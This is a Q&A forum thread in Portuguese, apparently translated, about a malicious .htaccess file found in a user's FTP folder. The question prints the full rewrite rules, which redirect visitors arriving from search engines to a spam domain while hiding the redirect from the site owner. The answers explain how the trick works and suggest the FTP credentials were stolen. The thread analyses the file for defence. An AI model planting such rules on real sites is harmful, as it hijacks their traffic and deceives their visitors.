Arquivo .htaccess suspeito

Navegue suas respostas
19

Isso foi enviado para uma das minhas pastas de FTP. Eu não estou familiarizado com o Apache, mas ainda curioso - alguém pode me dizer que tipo de ato covarde este arquivo está tentando cometer? Obrigado! 

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
    
por ovinophile 02.11.2009 / 16:48

3 respostas

15

Isso envia os usuários que chegam de um mecanismo de pesquisa ao último site SPAMMER.info (consulte o histórico de perguntas do site atual ).

Ele procura referenciadores em uma tentativa de se esconder de você , já que você provavelmente não acessa o site por meio dos mecanismos de pesquisa. Ou seja, se você for diretamente para a URL, tudo parece normal. No entanto, se você entrar por meio de um mecanismo de pesquisa, será redirecionado.

Observação: isso não afeta os rastreadores da web, pois eles ( googlebot, pelo menos ) não defina o cabeçalho do referenciador.

    
por 02.11.2009 / 16:51
8

Sempre que um usuário de um mecanismo de pesquisa acessar qualquer página do seu site, ele será redirecionado para o site de spam .info.

É muito sorrateiro - você não notará que algo está errado, já que você normalmente digitará o endereço.

    
por 02.11.2009 / 16:49
1

para adicionar mais - provavelmente suas credenciais de ftp vazaram. talvez você os tenha salvado em filezilla / total commander, etc. há muitos malwares roubando-os e, em seguida, 'indo' - acessando contas FTP, anexando javascript malicioso a index.php / html ou colocando arquivos de reescrita similares.

    
por 04.11.2009 / 00:13

Tags

Logrotate and Open Files Como eu limite o uso de memória do MS SQL Server?